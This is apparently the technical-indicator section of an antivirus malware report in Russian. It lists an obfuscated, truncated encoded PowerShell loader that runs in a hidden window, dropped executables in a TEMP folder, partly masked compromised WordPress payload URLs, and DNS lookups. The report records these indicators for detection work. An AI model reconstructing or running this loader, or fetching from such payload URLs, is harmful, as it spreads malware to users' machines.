Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXAHQAagBwADcAegBmAD0AKAAnAEkANQAnACsAJwBzAG8AJwArACcAcwBoAGQAJwApADsALgAoACcAbgBlAHcALQAnACsAJwBpACcAKwAnAHQAZQBtACcAKQAgACQAZQBOAFYAOgB0AEUATQBQAFwAbwBGAEYASQBDAGUAMgAwADEAOQAgAC0AaQB0AG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1492
- %TEMP%\596360.cvr
- %TEMP%\office2019\kk3n73.exe
- %TEMP%\office2019\kk3n73.exe
- 'sa###bby.com':80
- 'he####payless.com':80
- 'mg##e.com':80
- 'hu###omains.com':443
- http://sa###bby.com/wp-admin/LJin/
- http://he####payless.com/wp-includes/pcfQhqb/
- http://www.mg##e.com/fonts/KNnEVB/
- 'hu###omains.com':443
- DNS ASK sa###bby.com
- DNS ASK ma#########rsvideochatwithourkids.com
- DNS ASK pl#####oolmatritva.com
- DNS ASK or###wise.us
- DNS ASK he####payless.com
- DNS ASK mg##e.com
- DNS ASK hu###omains.com
- DNS ASK po###yter.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXAHQAagBwADcAegBmAD0AKAAnAEkANQAnACsAJwBzAG8AJwArACcAcwBoAGQAJwApADsALgAoACcAbgBlAHcALQAnACsAJwBpACcAKwAnAHQAZQBtACcAKQAgACQAZQBOAFYAOgB0AEUATQBQAFwAbwBGAEYASQBDAGUAMgAwADEAOQAgAC0AaQB0AG... (со скрытым окном)